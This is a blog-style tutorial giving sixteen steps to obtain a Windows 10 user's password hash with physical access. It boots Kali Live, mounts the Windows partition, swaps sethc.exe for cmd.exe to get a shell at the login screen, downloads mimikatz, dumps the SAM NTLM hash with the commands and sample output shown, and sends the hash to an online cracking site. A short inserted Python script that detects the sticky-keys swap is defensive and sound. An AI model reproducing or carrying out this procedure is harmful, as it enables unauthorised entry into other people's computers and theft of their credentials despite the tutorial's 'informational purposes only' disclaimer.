Get Any Windows 10 Anniversary Password Hash in 16 Steps

Karl Is Wright | Computer Repair, DIY, Penetration Testing, Tutorial, Windows Tips

Windows 10 Password Hacking

(Even with Anniversary Update)

NOTE: The content of this tutorial is for INFORMATIONAL PURPOSES ONLY

I do not condone any unethical activity

Step 1 – Get a USB stick (4GB fine)

Step 2 – Download the Kali Live DVD ISO – direct download link – Instructions for n00bs

Step 3 – Download Rufus (they have a portable edition for those who hate installing new software)

Step 4 – Use Rufus to put Kali Live on USB

Insert your USB stick of choice into your potato (it will be formatted, so make sure it’s got nothing important on it!)

Open up Rufus, follow instructions (if it asks for either ISO or DD mode, I choose ISO)

Step 5 – On affected computer, boot to Kali Live USB (username is root, password is toor)

Step 6 – Open up a terminal in Kali and run the following:

sfdisk -l -uM

This will list all the partitions on all your computer’s drives and give you the size of each. You need to pick out the Windows (NTFS) partition, e.g.

/dev/sda2 71680+ 476938 405259- 414984520+ NTFS

Step 7 – mount local Windows 10 disk by using following:

First create a mountpoint,

mkdir /media/windows

Now we can mount the local drive. Remember to replace * with the appropriate partition.

mount -t ntfs-3g -o remove_hiberfile /dev/sda* /media/windows

NOTE: Windows 10 no longer “shuts down” fully, the way older Windows versions did. Instead it hibernates (fast startup). You’ll need to remove the hibernation file, or ntfs-3g will only let the kernel mount the volume read-only.

Step 8 – Switch up the cmd and sethc files.

Open a Terminal

cd /media/windows/Windows/System32

mv sethc.exe sethc.old

cp cmd.exe sethc.exe

(The mv already moves the original out of the way, so there is nothing left to rm before the copy.)

Note: This replaces the sticky-keys program with a command shell. When we head back to the Windows login screen we can get into a shell without logging in by pressing the SHIFT key five times.
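From the defender’s side, the swap in Step 8 leaves two obvious artifacts on disk: sethc.exe becomes byte-identical to cmd.exe, and the renamed sethc.old is left behind. The following audit script is an added example (not part of the original tutorial) that checks a System32 directory for both, e.g. one mounted read-only from a live USB as in Step 7; the sample directory it builds contains placeholder bytes rather than real Windows binaries.

```python
"""Audit a Windows System32 directory for the sticky-keys swap described
in Step 8: sethc.exe replaced by a copy of cmd.exe, with sethc.old left over."""
import hashlib
import os
import tempfile

ACCESSIBILITY_BINARY = "sethc.exe"   # the binary the tutorial replaces
SHELL_BINARY = "cmd.exe"
LEFTOVER_BACKUP = "sethc.old"        # rename artifact the swap leaves behind


def sha256_of(path):
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def audit_system32(system32):
    """Return findings for one System32 directory (a path, already mounted)."""
    sethc = os.path.join(system32, ACCESSIBILITY_BINARY)
    cmd = os.path.join(system32, SHELL_BINARY)
    findings = {
        # A legitimate sethc.exe never has the same contents as cmd.exe.
        "sethc_is_cmd": (os.path.isfile(sethc) and os.path.isfile(cmd)
                         and sha256_of(sethc) == sha256_of(cmd)),
        "leftover_backup": os.path.isfile(os.path.join(system32, LEFTOVER_BACKUP)),
    }
    findings["suspicious"] = any(findings.values())
    return findings


def build_sample_system32(swapped):
    """Constructed sample standing in for a real System32 (placeholder bytes,
    not Windows binaries). swapped=True mimics the state after Step 8."""
    d = tempfile.mkdtemp(prefix="system32_")
    cmd_bytes = b"MZ-placeholder-cmd"
    sethc_bytes = cmd_bytes if swapped else b"MZ-placeholder-sethc"
    with open(os.path.join(d, SHELL_BINARY), "wb") as f:
        f.write(cmd_bytes)
    with open(os.path.join(d, ACCESSIBILITY_BINARY), "wb") as f:
        f.write(sethc_bytes)
    if swapped:
        with open(os.path.join(d, LEFTOVER_BACKUP), "wb") as f:
            f.write(b"MZ-placeholder-sethc")
    return d


if __name__ == "__main__":
    for state in (False, True):
        print("swapped" if state else "clean", audit_system32(build_sample_system32(state)))
```

On a real image, point audit_system32 at /media/windows/Windows/System32; a match between sethc.exe and cmd.exe (or any other accessibility binary) is worth investigating even without the leftover backup.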

Step 9 – Change Dir and ensure you have 7z

cd /media/windows/

apt install p7zip-full

(p7zip-full is the Debian package that provides the 7za binary used below; plain p7zip only ships 7zr.)

Step 10 – Get mimikatz

wget "https://github.com/gentilkiwi/mimikatz/releases/download/2.1.1-20170618/mimikatz_trunk.7z"

7za x -omimikatz mimikatz_trunk.7z

(7za takes the command letter without a leading dash, and -o is followed directly by the output directory name with no space.)

Step 11 –  Reboot into Windows 10

Step 12 – At the login screen hit SHIFT x5

Step 13 – When the command shell pops up,

cd C:\mimikatz\x64

mimikatz.exe

Step 14 – Run the series of commands shown after the mimikatz # prompt to get your password hash

The following session is taken from the mimikatz GitHub wiki:

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # token::whoami
 * Process Token : 623884       vm-w7-ult-x\Gentil Kiwi S-1-5-21-1982681256-1210654043-1600862990-1000  (14g,24p)       Primary
 * Thread Token  : no token

mimikatz # token::elevate
Token Id  : 0
User name :
SID name  : AUTORITE NT\Système

228     24215           AUTORITE NT\Système     S-1-5-18        (04g,30p)       Primary
 -> Impersonated !
 * Process Token : 623884       vm-w7-ult-x\Gentil Kiwi S-1-5-21-1982681256-1210654043-1600862990-1000  (14g,24p)       Primary
 * Thread Token  : 624196       AUTORITE NT\Système     S-1-5-18        (04g,30p)       Impersonation (Delegation)

mimikatz # lsadump::sam

Look for the user account you want the hash for:

RID  : 000003e8 (1000)
User : Gentil Kiwi
LM   :
NTLM : cc36cf7a8514893efccd332446158b1a

What follows after NTLM is the NT hash of the user account’s password.

By the way, as an aside, if the NTLM hash reads:

31d6cfe0d16ae931b73c59d7e0c089c0

then the password is blank; there is no password (that value is the NT hash of the empty string).

Step 15 – Now you have your password hash. Take it, write it down, whatever, just take it and enter it into the appropriate field over at HashKiller.co.uk and see if the cloud can decipher the password.

Step 16 – Enjoy. Live life. Eat cake.